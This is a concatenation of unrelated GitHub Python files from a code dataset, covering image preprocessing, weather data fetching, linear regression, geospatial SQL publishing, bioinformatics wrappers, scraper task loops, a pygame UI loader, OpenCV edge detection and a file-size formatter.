than width x height are center-cropped; smaller ones are returned unchanged\n    if im.size[0] > width:\n        im = im.crop((((im.size[0]-width)/2),0,(im.size[0]-(im.size[0]-width)/2),im.size[1]))\n    if im.size[1] > height:\n        im = im.crop((0,((im.size[1]-height)/2),im.size[0],(im.size[1]-(im.size[1]-height)/2)))\n    im_matrix = np.array(im)\n    print(im_matrix.size)\n    im.close()\n    return im_matrix\n    \n\n
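# Hedged usage sketch (editorial addition; 'cell.jpg' is a hypothetical file):\n#\n#     pixels = preprocessImage('cell.jpg')            # center-crop to at most 400x400\n#     wide = preprocessImage('cell.jpg', width=600, height=300)\n#     print(pixels.shape)                             # e.g. (400, 400, 3) for an RGB JPEG\n\n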
#Random PILLOW commands\n#im.show()\n#print(im.format)\n#print(im.mode)\n#print(im.size)\n#print(im.width, im.height)\n#print(im.info)\n#left, upper, right, lower\n#cropped.show()\n#save the cropped image\n#cropped.save('images/croppedBeach1.jpg')","repo_name":"cfinley569/Spermatid-Image-Analysis","sub_path":"ImagePreprocessing.py","file_name":"ImagePreprocessing.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"34498180371","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jan 12 10:41:12 2022\r\n\r\n@authors: Moin, Gargi, Rishabh\r\n\"\"\"\r\nimport urllib.request\r\nimport math\r\n\r\n\r\ndef line_averages(filename):\r\n    with open(filename, 'r') as f:\r\n        lines = f.readlines()\r\n    for line in lines:\r\n        s = 0.0\r\n        for elem in line.split(','):\r\n            s = s + int(elem)\r\n        avg = s/len(line.split(','))\r\n        print(avg)\r\n\r\n\r\ndef noaa_string():\r\n    \"\"\"Fetch from the Internet and return the current NOAA METAR\r\n    weather observation data for EDDH (Hamburg Airport) as a string.\r\n    \"\"\"\r\n    url = \"http://tgftp.nws.noaa.gov/data/observations/metar/decoded/EDDH.TXT\"\r\n    noaa_data_string = urllib.request.urlopen(url).read()\r\n    return noaa_data_string.decode(\"utf-8\")\r\n\r\n\r\ndef noaa_temperature(s):\r\n    y = []\r\n    for elem in range(len(s)):\r\n        y = s.split()\r\n    for t in y:\r\n        if t == \"Temperature:\":\r\n            x = y.index(t)+1\r\n            print(y[x])\r\n            d = (int(y[x])-32)*(5/9)\r\n    return math.ceil(d)\r\n","repo_name":"rishabhmoolya/MPSD_Workshop","sub_path":"training4.py","file_name":"training4.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"35226885082","text":"#Simple regression\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 24 23:49:15 2018\n\n@author: karta\n\"\"\"\n#importing libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n#importing datasets\ndataset = pd.read_csv(\"Salary_Data.csv\")\n\nx = dataset.iloc[:,:-1].values\ny = dataset.iloc[:,1].values\n\n#Splitting the data into training and test set\nfrom sklearn.model_selection import train_test_split\nx_train,x_test,y_train,y_test = train_test_split(x,y,test_size = 1/3, random_state = 0)\n\n#Training the simple regression model\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(x_train,y_train)\n\n#Asking the model to predict the test results\ny_pred = regressor.predict(x_test)\n\n# Visualising the training set results\nplt.scatter(x_train, y_train, color='red')\nplt.plot(x_train, regressor.predict(x_train))\nplt.title(\"Salary vs Experience (Training set)\")\nplt.xlabel('Experience')\nplt.ylabel(\"Salary\")\nplt.show()\n\n# Visualising the test set results\nplt.scatter(x_test, y_test, color='red')\nplt.plot(x_train, regressor.predict(x_train))\nplt.title(\"Salary vs Experience (Test set)\")\nplt.xlabel('Experience')\nplt.ylabel(\"Salary\")\nplt.show()","repo_name":"KartavyaKothari/Machine-learning-learning","sub_path":"Part 2 - Regression/Section 4 - Simple Linear Regression/simple_LR.py","file_name":"simple_LR.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"23526084548","text":"# coding: utf-8\n\nimport pandas as pd\n\nfrom niamoto.conf import settings\nfrom niamoto.data_publishers.base_data_publisher import BaseDataPublisher\nfrom 
niamoto.data_marts.dimensions.vector_dimension import VectorDimension\nfrom niamoto.db.connector import Connector\nfrom niamoto.log import get_logger\n\n\nLOGGER = get_logger(__name__)\n\n\nclass VectorHierarchyPublisher(BaseDataPublisher):\n \"\"\"\n Publish vector hierarchies from the niamoto vector database.\n Produce an association table containing the identifiers of nested vectors.\n Uses the data from published vector dimensions.\n \"\"\"\n\n @classmethod\n def get_key(cls):\n return 'vector_hierarchy'\n\n @classmethod\n def get_description(cls):\n return \"Publish a vector hierarchy from the niamoto vector database.\"\n\n @classmethod\n def get_publish_formats(cls):\n return []\n\n def _process(self, vector_names, *args, buffer_size=0.001, **kwargs):\n \"\"\"\n :param vector_names: List of the vector names for the hierarchy.\n Ordering is important, the first element corresponds to the\n highest level of the hierarchy while the last element corresponds\n to the smallest level of the hierarchy.\n :return: A GeoDataFrame corresponding to the vector to publish.\n \"\"\"\n level_ids = ','.join(\n [\"{}.id AS {}_id\".format(v, v) for v in vector_names]\n )\n where_clause = \"WHERE \" + \" AND \".join(\n [\"{}.id IS NOT NULL\".format(v) for v in vector_names]\n )\n highest_level = vector_names.pop(0)\n dim_tables = \"{schema}.{tb} AS {tb}\".format(**{\n 'schema': settings.NIAMOTO_DIMENSIONS_SCHEMA,\n 'tb': highest_level,\n })\n previous_level = highest_level\n previous_geom = VectorDimension(highest_level).geom_col[0]\n for level in vector_names:\n geom = VectorDimension(level).geom_col[0]\n dim_tables += \\\n \"\"\"\n LEFT JOIN {schema}.{tb} AS {tb}\n ON ST_Within(\n ST_Buffer({tb}.{geom}, -{buffer}),\n {prev_tb}.{prev_geom}\n )\n \"\"\".format(**{\n 'schema': settings.NIAMOTO_DIMENSIONS_SCHEMA,\n 'tb': level,\n 'prev_tb': previous_level,\n 'geom': geom,\n 'prev_geom': previous_geom,\n 'buffer': buffer_size,\n })\n previous_level = level\n previous_geom = geom\n sql = \\\n \"\"\"\n SELECT {level_ids}\n FROM {dim_tables}\n {where_clause};\n \"\"\".format(\n **{\n 'level_ids': level_ids,\n 'dim_tables': dim_tables,\n 'where_clause': where_clause,\n }\n )\n with Connector.get_connection() as connection:\n df = pd.read_sql(sql, connection)\n return df\n","repo_name":"niamoto/niamoto-core","sub_path":"niamoto/data_publishers/vector_hierarchy_publisher.py","file_name":"vector_hierarchy_publisher.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"8873877812","text":"\"\"\"A simple wrapper for run_bam_to_fasta\nin pbcoretools.tasks.converters\n\"\"\"\nfrom __future__ import absolute_import\nfrom ..sys import system\n#from pbcoretools.tasks.converters import run_fasta_to_reference, run_fasta_to_referenceset\nfrom pbcore.io import (ContigSet, ReferenceSet)\nimport argparse\nimport logging\nimport sys\nimport os.path as op\n\nlog = logging.getLogger(__name__)\n\ndef run_fasta_to_referenceset(input_file_name, output_file_name, prog):\n \"\"\"Copied from pbsmrtpipe/pb_tasks/pacbio.py:run_fasta_to_referenceset()\n \"\"\"\n args = ['dataset', \"create\", \"--type ReferenceSet\", \"--generateIndices\",\n output_file_name, input_file_name]\n system(\" \".join(args))\n\ndef run_fasta_to_reference(input_file_name, output_file_name,\n organism, reference_name,\n ploidy):\n \"\"\"Copied from pbcoretools/tasks/converters.py:run_fasta_to_reference()\n \"\"\"\n ds_in = ContigSet(input_file_name)\n if 
len(ds_in.externalResources) > 1:\n        raise TypeError(\"Only a single FASTA file is supported as input.\")\n    fasta_file_name = ds_in.externalResources[0].resourceId\n    output_dir_name = op.dirname(output_file_name)\n    args = [\n        \"fasta-to-reference\",\n        \"--organism\", organism,\n        \"--ploidy\", ploidy,\n        \"--debug\",\n        fasta_file_name,\n        output_dir_name,\n        reference_name\n    ]\n    log.info(\" \".join(args))\n    system(\" \".join(args))\n    ref_file = op.join(output_dir_name, reference_name, \"referenceset.xml\")\n    assert op.isfile(ref_file)\n    with ReferenceSet(ref_file, strict=True) as ds_ref:\n        ds_ref.makePathsAbsolute()\n    log.info(\"saving final ReferenceSet to {f!r}\".format(f=output_file_name))\n    ds_ref.write(output_file_name)\n\ndef run(fasta, ref):\n    try:\n        # This uses Python + BAM library.\n        run_fasta_to_referenceset(fasta, ref, 'dataset')\n        return\n    except Exception:\n        log.exception('We will try another approach.')\n\n    try:\n        # This uses Python + BAM library.\n        # the '.py' name difference will be resolved in pbdataset/pbcoretools, but\n        # for now, work with either\n        run_fasta_to_referenceset(fasta, ref, 'dataset.py')\n        return\n    except Exception:\n        log.exception('We will try something else.')\n        raise\n\n    try:\n        # This uses pbscala and also runs sawriter.\n        reference_name = op.splitext(op.basename(fasta))[0]\n        organism = \"unknown\"\n        ploidy = \"haploid\"\n        run_fasta_to_reference(fasta, ref, organism=organism, reference_name=reference_name, ploidy=ploidy)\n    except Exception:\n        log.exception('Out of ideas.')\n        raise\n\n\ndef main(argv=sys.argv):\n    description = \"\"\"Create referenceset XML from fasta.\n\"\"\"\n    epilog = \"\"\"\nThere might be extra files too. We use fasta-to-reference (from pbscala)\nif available (which would also run sawriter).\nOtherwise, we use 'dataset create'.\nThe fasta might be copied, and the dataset should refer to it absolutely (I think).\n\"\"\"\n    parser = argparse.ArgumentParser(\n        description=description,\n        epilog=epilog,\n        formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n    #parser.add_argument('--logging',\n    #    help='.ini or .json config file for Python logging module')\n    parser.add_argument('fasta',\n        help='Input fasta filename.')\n    parser.add_argument('ref',\n        help='Output referenceset XML filename.')\n    args = parser.parse_args(argv[1:])\n    log.info('RUNNING run_fasta2reference: {}'.format(repr(args)))\n    run(**vars(args))\n\nif __name__ == \"__main__\":\n    logging.basicConfig()\n    logging.getLogger().setLevel(logging.DEBUG)\n    main(sys.argv)\n","repo_name":"lpp1985/lpp_Script","sub_path":"pacbiolib/pacbio/pythonpkgs/falconpolish/lib/python2.7/site-packages/falcon_polish/mains/run_fasta2referenceset.py","file_name":"run_fasta2referenceset.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"39"} +{"seq_id":"16218855564","text":"import sys\nimport django\nimport os\nimport pathlib\nimport js2py\nimport threading\nfrom django_redis import get_redis_connection\nif __name__ == \"__main__\":\n    basedir = str(pathlib.Path(__file__).resolve().parent.parent)\n    os.chdir(basedir)\n    sys.path.append(basedir)\n    os.environ['DJANGO_SETTINGS_MODULE'] = 'soyoung.settings'\n    django.setup()\n\nfrom grab.createsession import createsession\nfrom grab.models import Product, Hospital, Reviewer,Diary,Doctor\nimport datetime, time\nimport re, json\nimport psutil\nfrom django.conf import settings\nfrom django.core.cache import cache\nfrom dotmap import DotMap\nfrom bs4 import BeautifulSoup\n
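# --- Added note (not from the original file): beforecheck() below is a PID-file\n# singleton guard; roughly, it reads run/<name>.pid, exits early via exit(0) when\n# that pid still resolves to a live psutil.Process, and otherwise records\n# os.getpid() so the next invocation can see this run.\nimport 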
sys\ndef beforecheck(name):\n pidfile = f'{name}.pid'\n if os.path.exists(os.path.join(settings.BASE_DIR, 'run', pidfile)):\n with open(os.path.join(settings.BASE_DIR, 'run', pidfile), 'r') as f:\n pid = int(f.read())\n try:\n p = psutil.Process(pid)\n exit(0)\n except Exception as e:\n print(e)\n with open(os.path.join(settings.BASE_DIR, 'run', pidfile), 'w') as f:\n f.write(str(os.getpid()))\n\nfrom grab.checkuser import checkproduct,checkproductdiary,checkdiary,checkdiaryreply,checkhospital,checkdoctor,checkuser,checkdoctordiary,checkdoctorxiangmu\n\ndef task_checkdiary():\n con = get_redis_connection('default')\n beforecheck('task_checkdiary')\n while 1:\n arr=con.zrange('diary_list',0,3)\n ath=[threading.Thread(target=checkdiary,args=(did.decode(),)) for did in arr]\n [th.start() for th in ath]\n [th.join() for th in ath]\n # for did in arr:\n # checkdiary(did.decode())\n #time.sleep(0.01)\n con.zrem('diary_list', *arr)\n print('aftersleep')\n\n\ndef task_checkuser():\n con = get_redis_connection('default')\n beforecheck(sys._getframe().f_code.co_name)\n while 1:\n arr=con.zrange('user_list',0,3)\n print('arrL',arr)\n ath=[threading.Thread(target=checkuser,args=(did.decode(),)) for did in arr]\n [th.start() for th in ath]\n [th.join() for th in ath]\n # for did in arr:\n # tmp=checkuser(did.decode())\n #time.sleep(0.01)\n con.zrem('user_list',*arr)\n print('aftersleep')\n\ndef task_checkproduct():\n con = get_redis_connection('default')\n beforecheck(sys._getframe().f_code.co_name)\n while 1:\n arr=con.zrange('product_list',0,3)\n ath=[threading.Thread(target=checkproduct,args=(did.decode(),)) for did in arr]\n [th.start() for th in ath]\n [th.join() for th in ath]\n # for did in arr:\n # tmp=checkproduct(did.decode())\n #time.sleep(0.01)\n con.zrem('product_list', *arr)\n print('aftersleep')\n\ndef task_checkhospital():\n con = get_redis_connection('default')\n beforecheck(sys._getframe().f_code.co_name)\n while 1:\n arr=con.zrange('hospital_list',0,3)\n ath=[threading.Thread(target=checkhospital,args=(did.decode(),)) for did in arr]\n [th.start() for th in ath]\n [th.join() for th in ath]\n # for did in arr:\n # checkhospital(did.decode())\n #time.sleep(0.01)\n con.zrem('hospital_list', *arr)\n print('aftersleep')\nfrom grab.checkuser import checkuserflow,checkuserfans\ndef task_checkdoctor():\n con = get_redis_connection('default')\n beforecheck(sys._getframe().f_code.co_name)\n while 1:\n arr=con.zrange('doctor_list',0,3)\n ath=[threading.Thread(target=checkdoctor,args=(did.decode(),)) for did in arr]\n [th.start() for th in ath]\n [th.join() for th in ath]\n # for did in arr:\n # checkdoctor(did.decode())\n #time.sleep(0.01)\n con.zrem('doctor_list', *arr)\n print('aftersleep')\n\n\n#164361819\nif __name__=='__main__':\n task_checkuser()","repo_name":"fengchuan1021/soyoung","sub_path":"grab/cron_task.py","file_name":"cron_task.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"18021755369","text":"# ui_dict = {\n# textobj_list = []\n# tile_list = [\n# tile = {\n# animations = {\n# state_default =\n# state_mdown =\n# }\n# trigger_id =\n# mirrored =\n# flipped\n# width =\n# height =\n# positions = [\n# [x, y]\n# [x, y]\n# ...\n# ]\n# }\n# ...\n# ]\n#\n# trigger_map = [\n# trigger_id = {\n# trigger_id =\n# top = [x, y]\n# left = [x, y]\n# bottom = [x, y]\n# right = [x, y]\n# state =\n# key_code =\n# }\n# ]\n# sound_set = {\n# sound = {\n# sound_name\n# trigger_id = {\n# states = 
[]\n# }\n# }\n# }\n# }\n\nimport pygame\nfrom class_UIText import UIText\n\n\nclass UIElement:\n\n def __init__(self, gameboard, ui_name):\n # Initialize attributes to represent the character.\n\n self.gameboard = gameboard\n self.image = None\n self.screen = self.gameboard.screen\n\n self.mousefollow = 0\n self.stick_hor = -1\n self.stick_ver = -1\n self.offset_x = 0\n self.offset_y = 0\n\n self.textlayer_list = []\n self.uielement = self.load_uielement(ui_name)\n self.active = True\n self.x = 0\n self.y = 0\n\n def load_uielement(self, ui_name):\n textobj_list = []\n dyn_textobj_dict = {}\n trigger_map = {}\n tile_list = []\n tr_tile_dict = {}\n sound_list = {}\n\n uielement_list = self.gameboard.resources.read_file(self.gameboard.resources.uielements[ui_name])\n\n u = 0\n while u < len(uielement_list):\n if len(uielement_list[u]) > 0 and uielement_list[u][0] != '#':\n element_name, element_content = uielement_list[u].split(\"=\")\n if element_name == 'alignment':\n content_list = element_content.split()\n self.mousefollow, self.stick_hor, self.stick_ver, self.offset_x, self.offset_y = float(\n content_list[0]), float(content_list[1]), float(content_list[2]), float(content_list[3]), float(\n content_list[4])\n if element_name == 'ui_topleft':\n ui_x, ui_y = element_content.split(',')\n self.x, self.y = int(ui_x), int(ui_y)\n if element_name == 'text':\n new_text = self.create_text(element_content)\n textobj_list.append(new_text)\n elif element_name == 'dyn_text':\n new_text = self.create_dyn_text(element_content)\n dyn_textobj_dict[new_text.text_id] = new_text\n elif element_name == 'trigger':\n trigger_id, new_trigger = self.create_trigger(element_content)\n trigger_map[trigger_id] = new_trigger\n elif element_name == 'tr_tile':\n content_list = element_content.split()\n if len(content_list) == 6:\n anim_number = int(content_list[-1])\n anim_rows = uielement_list[u + 2:u + 2 + anim_number]\n position_list = uielement_list[u + 1].split()\n new_tr_tile = self.create_tr_tile(content_list[:5], position_list, anim_rows)\n tr_tile_dict[new_tr_tile['trigger_id']] = new_tr_tile\n u += (2 + anim_number)\n elif element_name == 'tile':\n content_list = element_content.split()\n if len(content_list) == 4:\n position_list = uielement_list[u + 1].split()\n new_tile = self.create_tile(content_list[:4], position_list, uielement_list[u + 2])\n tile_list.append(new_tile)\n u += 2\n elif element_name == 'sound':\n element_list = element_content.split()\n sound_list[element_list[0]] = element_list[1]\n u += 1\n uielement_dict = {\n 'textobj_list': textobj_list,\n 'dyn_textobj_dict': dyn_textobj_dict,\n 'trigger_map': trigger_map,\n 'tr_tile_dict': tr_tile_dict,\n 'tile_list': tile_list,\n 'sound_list': sound_list\n }\n return uielement_dict\n\n def create_text(self, text_content):\n if len(text_content) < 12:\n return False\n x, y, font, size, color, bg_color, h_align, v_align, max_width, max_height, timer, mov_x, mov_y, caption = text_content.split()\n x = float(x)\n y = float(y)\n font = font\n size = float(size)\n r, g, b = color.split(',')\n color = (int(r), int(g), int(b))\n r, g, b = bg_color.split(',')\n bg_color = (int(r), int(g), int(b))\n h_align = h_align\n v_align = v_align\n max_width = float(max_width)\n max_height = float(max_height)\n timer = int(timer)\n mov_x = int(mov_x)\n mov_y = int(mov_y)\n new_text = UIText(self.gameboard, 'no_id', caption, x, y, font, size, color, bg_color, h_align, v_align, max_width, max_height, timer, mov_x, mov_y)\n return new_text\n\n def create_dyn_text(self, 
text_content):\n if len(text_content) < 12:\n return False\n text_id, x, y, font, size, color, bg_color, h_align, v_align, max_width, max_height, timer, mov_x, mov_y = text_content.split()\n x = float(x)\n y = float(y)\n font = font\n size = float(size)\n r, g, b = color.split(',')\n color = (int(r), int(g), int(b))\n r, g, b = bg_color.split(',')\n bg_color = (int(r), int(g), int(b))\n h_align = h_align\n v_align = v_align\n max_width = float(max_width)\n max_height = float(max_height)\n timer = int(timer)\n mov_x = int(mov_x)\n mov_y = int(mov_y)\n new_text = UIText(self.gameboard, text_id, '', x, y, font, size, color, bg_color, h_align, v_align, max_width, max_height, timer, mov_x, mov_y)\n return new_text\n\n def create_trigger(self, trigger_content):\n trigger_id, rect, key_code = trigger_content.split()\n if len(trigger_content) < 3:\n return False\n top, left, bottom, right = rect.split(',')\n trigger_dict = {\n # 'trigger_id': trigger_id,\n 'top': float(top),\n 'left': float(left),\n 'bottom': float(bottom),\n 'right': float(right),\n 'state': 'default',\n 'key_code': int(key_code)\n }\n return trigger_id, trigger_dict\n\n def create_tr_tile(self, content_list, position_list, anim_rows):\n trigger_id, mirrored, flipped, width, height = content_list\n tile_dict = {\n 'trigger_id': trigger_id,\n 'mirrored': int(mirrored),\n 'flipped': int(flipped),\n 'width': float(width),\n 'height': float(height),\n 'positions': [],\n 'animations': {}\n }\n for position in position_list:\n pos_xy = position.split(',')\n print(pos_xy)\n pos_x = float(pos_xy[0])\n pos_y = float(pos_xy[1])\n tile_dict['positions'].append([pos_x, pos_y])\n for anim_row in anim_rows:\n state, anim = anim_row.split('=')\n tile_dict['animations'][state] = self.gameboard.resources.animations[anim]\n return tile_dict\n\n def create_tile(self, content_list, position_list, anim_row):\n mirrored, flipped, width, height = content_list\n tile_dict = {\n 'mirrored': int(mirrored),\n 'flipped': int(flipped),\n 'width': float(width),\n 'height': float(height),\n 'positions': [],\n 'animation': self.gameboard.resources.animations[anim_row]\n }\n for position in position_list:\n pos_xy = position.split(',')\n print(pos_xy)\n pos_x = float(pos_xy[0])\n pos_y = float(pos_xy[1])\n tile_dict['positions'].append([pos_x, pos_y])\n return tile_dict\n\n def blitme(self):\n if self.mousefollow:\n self.x, self.y = self.gameboard.mouse_x + self.offset_x * self.gameboard.square_width, self.gameboard.mouse_y + self.offset_y * self.gameboard.square_height\n else:\n if self.stick_hor != -1:\n self.x = self.gameboard.sight_width * self.stick_hor + self.offset_x * self.gameboard.square_width\n if self.stick_ver != -1:\n self.y = self.gameboard.sight_height * self.stick_ver + self.offset_y * self.gameboard.square_height\n\n # static tiles\n for tile in self.uielement['tile_list']:\n animation = tile['animation']\n image = animation.frames[animation.frame_index]\n mirrored, flipped = False, False\n if 'mirrored' in tile:\n mirrored = tile['mirrored'] # horisontal\n if 'flipped' in tile:\n flipped = tile['flipped'] # vertical\n image = pygame.transform.flip(image, mirrored, flipped)\n rect = image.get_rect()\n for x, y in tile['positions']:\n rect.topleft = round(x * self.gameboard.square_width + self.x), round(y * self.gameboard.square_height + self.y)\n # print(rect.topleft, self.gameboard.player_char.x, self.gameboard.player_char.y)\n self.screen.blit(pygame.transform.scale(image, (\n round(tile['width'] * self.gameboard.square_width),\n 
round(tile['height'] * self.gameboard.square_height))), rect)\n\n        # trigger tiles\n        for tr_id, tr_tile in self.uielement['tr_tile_dict'].items():\n            anim_state = self.uielement['trigger_map'][tr_id]['state']\n            if anim_state not in tr_tile['animations']:\n                anim_state = 'default'\n            animation = tr_tile['animations'][anim_state]\n            animation.checkme()\n            image = animation.frames[animation.frame_index]\n\n            mirrored, flipped = False, False\n            if 'mirrored' in tr_tile:\n                mirrored = tr_tile['mirrored'] # horizontal\n            if 'flipped' in tr_tile:\n                flipped = tr_tile['flipped'] # vertical\n            image = pygame.transform.flip(image, mirrored, flipped)\n            rect = image.get_rect()\n\n            for x, y in tr_tile['positions']:\n                rect.topleft = round(x * self.gameboard.square_width + self.x), round(y * self.gameboard.square_height + self.y)\n                # print(rect.topleft, self.gameboard.player_char.x, self.gameboard.player_char.y)\n                self.screen.blit(pygame.transform.scale(image, (\n                    round(tr_tile['width'] * self.gameboard.square_width),\n                    round(tr_tile['height'] * self.gameboard.square_height))), rect)\n\n        for text in self.uielement['textobj_list']:\n            if text.visible:\n                text.blitme(self.x, self.y)\n        for text in self.uielement['dyn_textobj_dict'].values():\n            if text.visible:\n                text.blitme(self.x, self.y)\n","repo_name":"Sprottenfraulein/IHHAB","sub_path":"class_UIElement.py","file_name":"class_UIElement.py","file_ext":"py","file_size_in_byte":11474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"12959595071","text":"import numpy as np\nimport cv2\nimport os\n\n\ndef get_histograms():\n    histograms = np.empty(512)\n    bins = np.array(range(512))\n    inds = np.digitize((np.array(range(581)) * 0.882), bins) - 1\n    for filename in os.listdir('../images/ST2MainHall4'):\n        print(filename)\n        img = cv2.imread('../images/ST2MainHall4/' + filename, 1).astype(int)\n
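        # --- Added aside (not from the original homework): the next line packs\n        # each BGR pixel into r*2 + g//4 + b//32 (red<<1, green>>2, blue>>5), so\n        # raw indices run 0..580 (510 + 63 + 7); the digitize() above rescales\n        # those 581 values into the 512 bins, compensating for the commented\n        # (r/32)*64 formula not matching the shifts used here.\n        # apply formula [(r/32) * 64 + (g/32) * 8 + b/32]. 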
Max index is 580\n indices = ((img[:, :, 2] << 1) + (img[:, :, 1] >> 2) + (img[:, :, 0] >> 5)).ravel()\n histogram = np.zeros(512)\n counts = np.bincount(indices)\n # map indices from 0 to 580 into the 512 bins\n for i in range(np.shape(counts)[0]):\n histogram[inds[i]] += counts[i]\n histograms = np.vstack([histograms, histogram])\n return histograms[1:]\n\n\ngray_img = cv2.imread('../images/ST2MainHall4/ST2MainHall4001.jpg', 0)\nimg = cv2.imread('../images/ST2MainHall4/ST2MainHall4001.jpg', 1)\nblues = img[:, :, 0]\ngreens = img[:, :, 1]\nreds = img[:, :, 2]\ngray_edges = cv2.Canny(gray_img, 100, 200) == 0\nblue_edges = cv2.Canny(blues, 100, 200) == 0\nred_edges = cv2.Canny(reds, 100, 200) == 0\ngreen_edges = cv2.Canny(greens, 100, 200) == 0\nsobelX_gray = cv2.Sobel(gray_img,cv2.CV_64F,1,0,ksize=5)\nsobelY_gray = cv2.Sobel(gray_img,cv2.CV_64F,0,1,ksize=5)\nsobelX_blue = cv2.Sobel(blues,cv2.CV_64F,1,0,ksize=5)\nsobelY_blue = cv2.Sobel(blues,cv2.CV_64F,0,1,ksize=5)\nsobelX_red = cv2.Sobel(reds,cv2.CV_64F,1,0,ksize=5)\nsobelY_red = cv2.Sobel(reds,cv2.CV_64F,0,1,ksize=5)\nsobelX_green = cv2.Sobel(greens,cv2.CV_64F,1,0,ksize=5)\nsobelY_green = cv2.Sobel(greens,cv2.CV_64F,0,1,ksize=5)\nsobelX_gray[gray_edges] = 0\nsobelY_gray[gray_edges] = 0\nsobelX_blue[blue_edges] = 0\nsobelY_blue[blue_edges] = 0\nsobelX_red[red_edges] = 0\nsobelY_red[red_edges] = 0\nsobelX_green[green_edges] = 0\nsobelY_green[green_edges] = 0\ncv2.imshow('img', sobelX_gray)\ncv2.imshow('edges', sobelX_gray)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"jchoi34/CS682","sub_path":"jchoi34_hw3.py","file_name":"jchoi34_hw3.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"12680687804","text":"# coding: utf-8\n\"\"\"Functions for reporting filesizes. Borrowed from https://github.com/PyFilesystem/pyfilesystem2\n\nThe functions declared in this module should cover the different\nuse cases needed to generate a string representation of a file size\nusing several different units. 
Since there are many standards regarding\nfile size units, three different functions have been implemented.\n\nSee Also:\n * `Wikipedia: Binary prefix `_\n\n\"\"\"\n\n__all__ = [\"decimal\"]\n\nfrom typing import Iterable, List, Optional, Tuple\n\n\ndef _to_str(\n size: int,\n suffixes: Iterable[str],\n base: int,\n *,\n precision: Optional[int] = 1,\n separator: Optional[str] = \" \",\n) -> str:\n if size == 1:\n return \"1 byte\"\n elif size < base:\n return \"{:,} bytes\".format(size)\n\n for i, suffix in enumerate(suffixes, 2): # noqa: B007\n unit = base**i\n if size < unit:\n break\n return \"{:,.{precision}f}{separator}{}\".format(\n (base * size / unit),\n suffix,\n precision=precision,\n separator=separator,\n )\n\n\ndef pick_unit_and_suffix(size: int, suffixes: List[str], base: int) -> Tuple[int, str]:\n \"\"\"Pick a suffix and base for the given size.\"\"\"\n for i, suffix in enumerate(suffixes):\n unit = base**i\n if size < unit * base:\n break\n return unit, suffix\n\n\ndef decimal(\n size: int,\n *,\n precision: Optional[int] = 1,\n separator: Optional[str] = \" \",\n) -> str:\n \"\"\"Convert a filesize in to a string (powers of 1000, SI prefixes).\n\n In this convention, ``1000 B = 1 kB``.\n\n This is typically the format used to advertise the storage\n capacity of USB flash drives and the like (*256 MB* meaning\n actually a storage capacity of more than *256 000 000 B*),\n or used by **Mac OS X** since v10.6 to report file sizes.\n\n Arguments:\n int (size): A file size.\n int (precision): The number of decimal places to include (default = 1).\n str (separator): The string to separate the value from the units (default = \" \").\n\n Returns:\n `str`: A string containing a abbreviated file size and units.\n\n Example:\n >>> filesize.decimal(30000)\n '30.0 kB'\n >>> filesize.decimal(30000, precision=2, separator=\"\")\n '30.00kB'\n\n \"\"\"\n return _to_str(\n size,\n (\"kB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\", \"YB\"),\n 1000,\n precision=precision,\n separator=separator,\n )\n","repo_name":"Textualize/rich","sub_path":"rich/filesize.py","file_name":"filesize.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","stars":45508,"dataset":"github-code","pt":"39"} +{"seq_id":"2711996967","text":"# -*- coding: UTF-8 -*-\n#activeness weight dict used by evaluate_index.py\nactiveness_weight_dict = {'activity_time':0.3, 'activity_geo':0.2, 'statusnum':0.5}\n#importance weight dict\nimportance_weight_dict = {'fansnum':0.3, 'retweeted_num':0.3, 'domain':0.2, 'topic':0.2}\n#topic weight dict\ntopic_weight_dict = {'政治':0.3, '军事':0.15, '社会':0.15, '环境':0.05, \\\n '医药':0.05, '经济':0.05, '交通':0.05, '教育':0.05, \\\n '计算机':0.05, '艺术':0.05, '体育':0.05}\n#domain weight dict\ndomain_weight_dict = {'文化':0.3, '媒体':0.3, '财经':0.1, '教育':0.1, \\\n '科技':0.05, '娱乐':0.05, '时尚':0.05, '体育':0.05}\n","repo_name":"lcwy220/sensitive_user_portrait","sub_path":"sensitive_user_portrait/cron/attribute/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"17917421181","text":"#!BPY\n# -*- coding: UTF-8 -*-\n# sync_bone_constraints\n#\n# Sync Armature's bone's constraints\n# And Sync bone's Inverse Kinematics Settings\n# 2018.06.06 N(Natukikazemizo)\n\nif \"bpy\" in locals():\n import imp\n imp.reload(utils_io_csv)\n imp.reload(bone_constraints)\n imp.reload(common)\nelse:\n from . import utils_io_csv\n from . 
